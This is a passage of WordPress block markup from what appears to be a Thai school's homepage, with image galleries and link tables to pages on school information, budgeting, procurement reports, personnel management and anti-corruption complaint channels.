{\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- 